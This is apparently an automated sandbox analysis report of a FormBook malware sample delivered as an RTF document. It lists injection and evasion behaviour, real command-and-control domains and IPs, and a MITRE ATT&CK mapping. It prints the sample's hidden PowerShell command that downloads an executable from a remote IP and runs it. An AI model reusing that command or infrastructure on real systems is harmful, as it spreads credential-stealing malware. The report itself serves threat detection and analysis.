          Source: C:\Users\user\AppData\Roaming\docsc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_004088B0 rdtsc
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_007426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_020B26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.foreverjsdesigns.com
          Source: C:\Windows\explorer.exe | Network Connect: 202.210.8.86 80
          Source: C:\Windows\explorer.exe | Network Connect: 44.230.85.241 80
          Source: C:\Windows\explorer.exe | Domain query: www.southernbrushworks.com
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe | Network Connect: 209.143.158.10 80
          Source: C:\Windows\explorer.exe | Network Connect: 75.2.115.196 80
          Source: C:\Windows\explorer.exe | Domain query: www.boostcoachingonline.com
          Source: C:\Windows\explorer.exe | Domain query: www.applewholesales.com
          Source: C:\Windows\explorer.exe | Domain query: www.thepocket-onlinelesson.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.ethereumdailypay.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.qqkit.net
          Source: C:\Windows\explorer.exe | Network Connect: 107.155.89.74 80
          Source: C:\Windows\explorer.exe | Domain query: www.betsysellsswfl.com
          Bypasses PowerShell execution policy
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Memory written: C:\Users\user\AppData\Roaming\docsc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: AA0000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE | Queries volume information: C:\Users\user\AppData\Local\Temp\OICE_A3A241B7-2F36-435D-B046-C9F74B3487D8.0\FLDA58.tmp VolumeInformation
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Queries volume information: C:\Users\user\AppData\Roaming\docsc.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Command and Scripting Interpreter11 | Path Interception | Process Injection611 | Masquerading1 | OS Credential Dumping | Security Software Discovery321 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scripting2 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools11 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Shared Modules1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | Exploitation for Client Execution33 | Logon Script (Mac) | Logon Script (Mac) | Process Injection611 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol122 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | PowerShell3 | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting2 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 412069; Sample: 1c60a1e9_by_Libranalysis; Startdate: 12/05/2021; Architecture: WINDOWS; Score: 100. The rendered graph is not reproduced here; its node labels give the following process chain:

          Sample-level nodes: www.4520oceanviewavenue.com, 4520oceanviewavenue.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 18 other signatures.
          WINWORD.EXE: drops C:\Users\user\AppData\Local\...\docsc[1].exe (PE32), C:\Users\user\AppData\Local\...\FLDA58.tmp, C:\Users\user\AppData\...\Abctfhghgdghgh .ScT (data) and C:\Users\user\AppData\Local\...\F3A4D79D.png; signatures: Document exploit detected (creates forbidden files), Suspicious powershell command line found, Tries to download and execute files (via powershell), Microsoft Office creates scripting files; starts three powershell.exe instances and FLTLDR.EXE.
          powershell.exe: contacts 157.55.173.72 (ports 49165, 49166, 80; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); drops C:\Users\user\AppData\Roaming\docsc.exe (PE32); signature: Powershell drops PE file; starts docsc.exe.
          docsc.exe: signatures: Detected unpacking (changes PE section rights), Machine Learning detection for dropped file, Tries to detect virtualization through RDTSC time measurements, 2 other signatures; starts two further docsc.exe instances.
          docsc.exe (child): signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process (thread injection); injects into explorer.exe.
          explorer.exe (injected): contacts www.thepocket-onlinelesson.xyz (202.210.8.86, ports 49168, 80; VECTANTARTERIANetworksCorporationJP, Japan), ethereumdailypay.com (209.143.158.10, ports 49172, 80; ILANDUS, United States) and 13 other IPs or domains; signatures: System process connects to network (likely due to code injection or exploit), Performs DNS queries to domains with low reputation; starts NAPSTAT.EXE.
          NAPSTAT.EXE: signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements; starts cmd.exe.

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
1c60a1e9_by_Libranalysis.rtf | 32% | ReversingLabs | Script-WScript.Trojan.RTFObfustream

          Dropped Files

Source | Detection | Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\docsc.exe | 100% | Joe Sandbox ML

          Unpacked PE Files

Source | Detection | Scanner | Label
10.2.docsc.exe.bd0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.docsc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner
betsysellsswfl.com | 0% | Virustotal
www.applewholesales.com | 0% | Virustotal

          URLs

Source | Detection | Scanner | Label
httP://157.55.173.72/goose/do | 0% | Avira URL Cloud | safe
http://www.foreverjsdesigns.com/a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV | 0% | Avira URL Cloud | safe
http://157.55.173.72/goose/docsc.exe | 0% | Avira URL Cloud | safe
www.rogegalmish.com/a8si/ | 0% | Avira URL Cloud | safe
httP://157.55.173.72/goose/docsc | 0% | Avira URL Cloud | safe
http://www.ethereumdailypay.com/a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== | 0% | Avira URL Cloud | safe
http://www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV | 0% | Avira URL Cloud | safe
httP://157.55.17 | 0% | Avira URL Cloud | safe
http://www.boostcoachingonline.com/a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== | 0% | Avira URL Cloud | safe
httP://157.55.173.72/goose/docsc.exePE1 | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.southernbrushworks.com/a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== | 0% | Avira URL Cloud | safe
http://www.betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV | 0% | Avira URL Cloud | safe
httP://157.55. | 0% | Avira URL Cloud | safe
http://www.applewholesales.com/a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV | 0% | Avira URL Cloud | safe
http://www.4520oceanviewavenue.com/a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== | 0% | Avira URL Cloud | safe
http://157.55.173.72 | 0% | Avira URL Cloud | safe
httP://157.55.173.72/go | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
4520oceanviewavenue.com | 184.168.131.241 | true | true | | unknown
betsysellsswfl.com | 107.155.89.74 | true | true | | unknown
ethereumdailypay.com | 209.143.158.10 | true | true | | unknown
www.applewholesales.com | 75.2.115.196 | true | true | | unknown
www.thepocket-onlinelesson.xyz | 202.210.8.86 | true | true | | unknown
uixie.porkbun.com | 44.230.85.241 | true | false | | high
boostcoachingonline.com | 184.168.131.241 | true | true | | unknown
southernbrushworks.com | 34.102.136.180 | true | false | | unknown
www.boostcoachingonline.com | unknown | unknown | true | | unknown
www.foreverjsdesigns.com | unknown | unknown | true | | unknown
www.southernbrushworks.com | unknown | unknown | true | | unknown
www.ethereumdailypay.com | unknown | unknown | true | | unknown
www.qqkit.net | unknown | unknown | true | | unknown
www.4520oceanviewavenue.com | unknown | unknown | true | | unknown
www.betsysellsswfl.com | unknown | unknown | true | | unknown

                                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.foreverjsdesigns.com/a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV | true | Avira URL Cloud: safe | unknown
http://157.55.173.72/goose/docsc.exe | true | Avira URL Cloud: safe | unknown
www.rogegalmish.com/a8si/ | true | Avira URL Cloud: safe | low
http://www.ethereumdailypay.com/a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== | true | Avira URL Cloud: safe | unknown
http://www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV | true | Avira URL Cloud: safe | unknown
http://www.boostcoachingonline.com/a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== | true | Avira URL Cloud: safe | unknown
http://www.southernbrushworks.com/a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== | false | Avira URL Cloud: safe | unknown
http://www.betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV | true | Avira URL Cloud: safe | unknown
http://www.applewholesales.com/a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV | true | Avira URL Cloud: safe | unknown
http://www.4520oceanviewavenue.com/a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== | true | Avira URL Cloud: safe | unknown

                                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.piriform.com/ccleanerhttp://KK | powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp | false | | high
httP://157.55.173.72/goose/do | powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp; powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp; powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp; powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp; powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp | false | | high
httP://157.55.173.72/goose/docsc | powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp; powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp; powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
httP://157.55.173.72/goose/docsc.exe | powershell.exe, 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp | true | | unknown
httP://157.55.17 | powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp; powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp; powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | low
httP://157.55.173.72/goose/docsc.exePE1 | powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp; powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp; powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner | powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp; powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp; powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp; powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp; powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmp | false | URL Reputation: safe | low
httP://157.55. | powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp; powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | low
http://157.55.173.72 | powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
httP://157.55.173.72/go | powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
209.143.158.10 | ethereumdailypay.com | United States | 14127 | ILANDUS | true
75.2.115.196 | www.applewholesales.com | United States | 16509 | AMAZON-02US | true
202.210.8.86 | www.thepocket-onlinelesson.xyz | Japan | 2519 | VECTANTARTERIANetworksCorporationJP | true
44.230.85.241 | uixie.porkbun.com | United States | 16509 | AMAZON-02US | false
34.102.136.180 | southernbrushworks.com | United States | 15169 | GOOGLEUS | false
157.55.173.72 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
184.168.131.241 | 4520oceanviewavenue.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
107.155.89.74 | betsysellsswfl.com | United States | 29802 | HVC-ASUS | true

                                              Private

                                              IP
                                              192.168.2.22
                                              192.168.2.255

                                              General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 412069
Start date: 12.05.2021
Start time: 11:32:45
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 52s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 1c60a1e9_by_Libranalysis (renamed file extension from none to rtf)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winRTF@20/17@9/10
EGA Information: Failed
HDC Information:
• Successful, ratio: 16.4% (good quality ratio 15.1%)
• Quality average: 66.6%
• Quality standard deviation: 30%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Report size exceeded maximum capacity and may have missing behavior information.
• TCP Packets have been reduced to 100
• Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
11:33:41 | API Interceptor | 69x Sleep call for process: powershell.exe modified
11:33:45 | API Interceptor | 82x Sleep call for process: docsc.exe modified
11:34:10 | API Interceptor | 209x Sleep call for process: NAPSTAT.EXE modified
11:35:01 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

Match | Associated Sample Name / URL | Detection | Context
75.2.115.196 | New_Order.exe | malicious | www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT
 | PO#6275473, Shipping.exe | malicious | www.neverpossible.com/nyr/?hFN=HMvQt6bkCevDbBHl57tIpg2VEEGTCu7btVM4jmpr9u1g6ochkRM7DKqFK8ehddD2fJuq&znp8sT=8pwxRHeHx
 | file.exe | malicious | www.officialtimelessbeauty.com/ud9e/?8pK0l4=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&EhU45z=gdJpOxNhdV
 | file.exe | malicious | www.officialtimelessbeauty.com/ud9e/?KtxD=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&p0D=AdhDQXr
 | Bill Of Lading & Packing List.pdf.gz.exe | malicious | www.officialtimelessbeauty.com/ud9e/?M6cphXg=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdcnguIyvoQlJN&VtX8=J48HPvgx
 | raw f.exe | malicious | www.officialtimelessbeauty.com/ud9e/?inCTmJ0x=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&lnxdA=rBZlir70eHDp
44.230.85.241 | win32.exe | malicious | www.leagueofconsciouscreatives.com/hx3a/?UR-hC=00Gdc830MjwppviP&ETPPOfO=Z+JplkT88/cA/L14tHfej1KuR/WXUTalQiDPTDA6hhHH4vrlYKoY+HvBwUu7Y82Qoonw
 | IN18663Q0031139I.xlsx | malicious | www.leagueofconsciouscreatives.com/hx3a/?rJ=w0G8E6&df=Z+JplkT584cE/b50vHfej1KuR/WXUTalQibfPAc7lBHG4eHjfa5UoDXDzyi9TNib9OTHnQ==
 | RQ100932871.exe | malicious | www.101farts.com/ckr/
157.55.173.72 | EBqJhAymeE.rtf | malicious | 157.55.173.72/music/play.exe
184.168.131.241 | INv02938727.exe | malicious | www.sequenceanalytica.com/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg==
 | ProForma Invoice 20210510.exe | malicious | www.reservesunbeds.com/u8nw/?yVUx=0BIXczdHaL8h5fn&hb8Tz=k2CKzalxf+HTI/YA5ZUZEbPplHxW2QsGEOhR0/8w4ZbDPb6D4jRkh7SQnOJYmVIWFsdJ
 | PO-UTITECH 0511.exe | malicious | www.youporn-live.net/sve/?hL=-Z3dvB&0nK83v=C8vvv0MaX2y/U2Z3Q9rasdODAQyMwmTqNTEWmqcd52/p7ch4zX9D9XByyfQTmXdQf7CQjqgJug==
 | POI09876OIUY.exe | malicious | www.ssssummit.com/uv34/?9rx=WMQTG0rumw6bKas1ntyyM+QsxkhHxu1ZUcBmNY6ij7cyCWSVhqmkPYQs9C/7EVYcnBE0&bJ=_P2pFHQpqJUh
 | 4si5VtPNTe.exe | malicious | www.brlnathletics.com/bucw/?APw8=MCIZYDzPkuscjpMKn6eGoQ/RcoYF14tLcsdPKcaWzW+X8DCZGW/2r27VfqhEjcQn85UoKzeBLw==&b62T=5jlLiNy09
 | invscan052021.exe | malicious | www.schmelzens.com/ued5/?5jRt=mdMCgS9ILlmCGgqJcZiXF4nHlR4RxT7ynU5KvIund6ihpo8hKpkex0rM9NCAHKrGECmZ&2dTH=c6AhPR10EV7lG
 | da.exe | malicious | www.palomachurch.com/8u3b/?dZ8=BT0h&hDKxoPS=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU7vIR5fuSTVT5I6wDQ==
 | Payment.xlsx | malicious | www.ottawahomevalues.info/8u3b/?zh=xUmcyzOh4HdFuvhunHHAKcZZd7JmKNqhEswdgXWKPEcA2epsJKzScQzpRfSI4u1UmTOkNQ==&BL3=jFNt_dFXS
 | PURCHASE ORDER 5112101.xlsx | malicious | www.myrootsandtrees.com/bucw/?btx=2DQmETE5ym4XCRWr28zmwwOJR5akFTB0jDotWvpECgLZnABSzS3kskU/ZtiFd8SyHqCl+w==&LzrL=u2M8sjUhfhtp-z
 | Materialliste f#U00fcr Angebot.exe | malicious | www.universallypc.com/mbg/?d4tTFV0x=JHtrtDQJDTvHmQjdlZxCkdFPYzqLg9GX2wZONh07d53HiePR7Au08rIVTnC7FKbvwxp0DBK+2w==&vP=9rQPzxEXvpg8-Jrp
